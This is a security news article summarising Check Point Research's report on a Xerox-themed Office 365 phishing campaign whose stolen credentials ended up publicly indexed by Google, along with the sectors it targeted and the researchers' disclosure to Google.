Threat actor behind a large-scale phishing campaign targeting thousands of organizations worldwide made a simple mistake that allowed anyone to access stolen credentials with a simple Google search.

The phishing campaign, which has been active since August 2020, involves emails disguised as Xerox scan notifications and uses dozens of domains that host the phishing pages and leverages compromised WordPress websites that serve as drop-zone servers.

“While this infection chain may sound simple, it successfully bypassed Microsoft Office 365 Advanced Threat Protection (ATP) filtering and stole over a thousand corporate employees’ credentials,” Check Point Research said in a blog post describing the campaign.

The phishing attack starts with an email imitating a Xerox/Xeros scan notification with the attached HTML file, which, when clicked on, displays a blurred image with a preconfigured email within the document. A JavaScript code would then run in the background of the document. This code would conduct simple password checks and send the data to the attackers’ drop-zone server. It also would redirect the user to a legitimate Office 365 login page.

The attackers used compromised accounts to distribute spam. In one instance, the researchers discovered a phishing page impersonating IONOS by 1&1, a German web hosting company. Check Point says it is “highly likely” that the compromised IONOS account credentials were used by the attackers to send the rest of the Office 365 themed spam.

However, once the users’ information was sent to the drop-zone servers, the data was saved in a publicly visible file that was indexable by Google allowing anyone access to the stolen email address credentials with a simple Google search.

Each server would be in action for roughly two months and would be linked to .XYZ domains that would be used in phishing attempts.

Based on a subset of nearly 500 stolen credentials the researchers were able to identify industries targeted in this campaign. It appears that the threat actor is mainly focused on companies in Construction, Energy and Information Technology sectors.

Check Point reached out to Google and informed the tech giant of the credential indexing.

“Victims now can use Google search capabilities to look for their stolen credentials and change their passwords accordingly,” Check Point said.